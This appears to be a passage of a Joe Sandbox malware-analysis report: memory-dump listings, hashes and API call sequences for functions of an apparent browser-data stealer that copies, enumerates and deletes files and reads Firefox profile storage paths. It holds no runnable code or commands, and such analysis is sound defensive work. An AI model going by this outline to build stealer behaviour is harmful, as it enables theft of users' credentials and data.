                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "=J$r_u
                          • API String ID: 0-3738298112
                          • Opcode ID: 0b7f2080e6ced17c48b05accd21a7f6ba2798568b7a73684cb11416af39caa36
                          • Instruction ID: f14a744e36861655009f67242b01a65be1e7f11059f63c9ff00caa1636315dac
                          • Opcode Fuzzy Hash: 0b7f2080e6ced17c48b05accd21a7f6ba2798568b7a73684cb11416af39caa36
                          • Instruction Fuzzy Hash: 7BB2E7F360C2049FE3146E29EC8577AFBE9EF94320F1A493DEAC4C7744EA3558058696
                          Function 00701914 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Sw{
                          • API String ID: 0-2793961255
                          • Opcode ID: 833e90220e612575a2dc238ac7a7f3cde4313dd27e0a0581998ff1c339d9adac
                          • Instruction ID: d7ea1a8ce041e6372121e36d392946d65da9e54817856c168181f65d1b8397c6
                          • Opcode Fuzzy Hash: 833e90220e612575a2dc238ac7a7f3cde4313dd27e0a0581998ff1c339d9adac
                          • Instruction Fuzzy Hash: 905129F3A085109FE304AE6DEC5577AB7DAEBE8321F1A493EE5C4C3344E97848058792
                          Function 0089D340 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: `o_
                          • API String ID: 0-1224030902
                          • Opcode ID: 6743614ec630975aa93cb1943e8527d4bbe96c70d516b9394860726da677aa50
                          • Instruction ID: 5d3928dfdca34cd0bb64e83a8140088e5a7fa02882e217614d01d0456cc9d7fd
                          • Opcode Fuzzy Hash: 6743614ec630975aa93cb1943e8527d4bbe96c70d516b9394860726da677aa50
                          • Instruction Fuzzy Hash: 4451F0F250C70CDBDB007E289C4167AB6E4FB94708F2A893D9AC6C6704F6315844A78F
                          Function 007325B6 Relevance: .2, Instructions: 197COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9f9f4a471513bcc76dd1e77217208f2fc92d7a68117ba153ff6983aa8b03e9c5
                          • Instruction ID: 3d0856532a22b2e91b37a8f0fe54b5dd2cddaaab84254c04510655fa1a50a3d6
                          • Opcode Fuzzy Hash: 9f9f4a471513bcc76dd1e77217208f2fc92d7a68117ba153ff6983aa8b03e9c5
                          • Instruction Fuzzy Hash: 775158F3E046144BE3106E3DDD88716BAE6EBD4220F2F8639DA98D7798E57558058282
                          Function 00751822 Relevance: .2, Instructions: 181COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0f363981e2f2f334949bfac1ef7fe115bc398822f780bd43501fc050070e995b
                          • Instruction ID: d94281be39992869d4fbe24714932dcd15f0d9d38b38c4231f6201558c475482
                          • Opcode Fuzzy Hash: 0f363981e2f2f334949bfac1ef7fe115bc398822f780bd43501fc050070e995b
                          • Instruction Fuzzy Hash: 715123F7A085005FE708AE29DC5577AB6D6EBC4320F2A853DEAC5D7784E9359C048292
                          Function 0075E5BC Relevance: .2, Instructions: 158COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dfd29b3e74f4d016cbf9575fdc3ecc573f916055d0551c81b824549b21970e23
                          • Instruction ID: d97e064146ae12cbacb83817e1e6f0918c3bf74b62ce4ebfacf8d6202af945f5
                          • Opcode Fuzzy Hash: dfd29b3e74f4d016cbf9575fdc3ecc573f916055d0551c81b824549b21970e23
                          • Instruction Fuzzy Hash: 634127B3A182144FF3086A39EC95767B7D6DBC4320F2B493DDB84D7780ED7898094696
                          Function 0072093B Relevance: .2, Instructions: 154COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9018785e7848dcd4b044dfd18ead7f352cb6e2c85ba6b35b42a718808c0d8fdd
                          • Instruction ID: 1f74744df6f5a7d6337359c50d35a81eeeaadd5f9661804a7114ff8c533c7c60
                          • Opcode Fuzzy Hash: 9018785e7848dcd4b044dfd18ead7f352cb6e2c85ba6b35b42a718808c0d8fdd
                          • Instruction Fuzzy Hash: 7B51B0B26083109FE304AF69EC847AAFBE4FF44720F1A493DEAC493740D67958458B97
                          Function 004185B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00418636
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041866D
                          • lstrcpy.KERNEL32(?,00000000), ref: 004186AA
                          • StrStrA.SHLWAPI(?,00FBDD38), ref: 004186CF
                          • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 004186EE
                          • lstrlen.KERNEL32(?), ref: 00418701
                          • wsprintfA.USER32 ref: 00418711
                          • lstrcpy.KERNEL32(?,?), ref: 00418727
                          • StrStrA.SHLWAPI(?,00FBDF90), ref: 00418754
                          • lstrcpy.KERNEL32(?,006393D0), ref: 004187B4
                          • StrStrA.SHLWAPI(?,00FBDF78), ref: 004187E1
                          • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00418800
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                          • String ID: %s%s
                          • API String ID: 2672039231-3252725368
                          • Opcode ID: 565a4cd9b0e4bcb21391a8c8fb1a17f51842d8d52a1eb9a055250aba843f9c2c
                          • Instruction ID: 70e839b95ede5b8f178571d91a8d5e2f23433e766b8548953c5dacf9730c6cf5
                          • Opcode Fuzzy Hash: 565a4cd9b0e4bcb21391a8c8fb1a17f51842d8d52a1eb9a055250aba843f9c2c
                          • Instruction Fuzzy Hash: ABF15C71A00614AFDB10DB68DD48ADAB7BAEF88300F144559F909E3351DBB4AE45CFE4
                          Function 00401F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00401F9F
                          • lstrlen.KERNEL32(00FB8B30), ref: 00401FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00401FE3
                          • lstrlen.KERNEL32(00431794), ref: 00401FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040200E
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00402042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040204D
                          • lstrlen.KERNEL32(00431794), ref: 00402058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00402075
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00402081
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004020AC
                          • lstrlen.KERNEL32(?), ref: 004020E4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00402104
                          • lstrcat.KERNEL32(00000000,?), ref: 00402112
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00402139
                          • lstrlen.KERNEL32(00431794), ref: 0040214B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040216B
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00402177
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040219D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004021A8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004021D4
                          • lstrlen.KERNEL32(?), ref: 004021EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040220A
                          • lstrcat.KERNEL32(00000000,?), ref: 00402218
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00402242
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040227F
                          • lstrlen.KERNEL32(00FBCFE0), ref: 0040228D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004022B1
                          • lstrcat.KERNEL32(00000000,00FBCFE0), ref: 004022B9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004022F7
                          • lstrcat.KERNEL32(00000000), ref: 00402304
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040232D
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00402356
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00402382
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004023BF
                          • DeleteFileA.KERNEL32(00000000), ref: 004023F7
                          • FindNextFileA.KERNEL32(00000000,?), ref: 00402444
                          • FindClose.KERNEL32(00000000), ref: 00402453
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                          • String ID:
                          • API String ID: 2857443207-0
                          • Opcode ID: 3ef745759e559b95ce9c0926d959cffad3ceca5b2ca35f7e6a40af200e4673fc
                          • Instruction ID: 7f0108977519a7202947b0206e488898bab42644744f99ad0bdbb35b15ebe32d
                          • Opcode Fuzzy Hash: 3ef745759e559b95ce9c0926d959cffad3ceca5b2ca35f7e6a40af200e4673fc
                          • Instruction Fuzzy Hash: D6E14D71B102169BCB21AF75DE89A9F77B9AF04304F04507AF805B72D1DBB8DD058BA8
                          Function 00416410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416445
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416480
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004164AA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004164E1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416506
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041650E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FolderPathlstrcat
                          • String ID: \..\
                          • API String ID: 2938889746-4220915743
                          • Opcode ID: 80642b8a0cf295fddfad45bc09744f060e10240317099413a1982c42e378211c
                          • Instruction ID: 89bcf9e358dd96d710254da3b8b6b538765559704cebe026861228018a21bd1d
                          • Opcode Fuzzy Hash: 80642b8a0cf295fddfad45bc09744f060e10240317099413a1982c42e378211c
                          • Instruction Fuzzy Hash: B0F19D70A012159BCB21AF79DD89AAF77B9AF40304F05402AB815A73D1DB7CDC85CFA8
                          Function 00414370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004143A3
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004143D6
                          • lstrcpy.KERNEL32(00000000,?), ref: 004143FE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00414409
                          • lstrlen.KERNEL32(\storage\default\), ref: 00414414
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414431
                          • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0041443D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414466
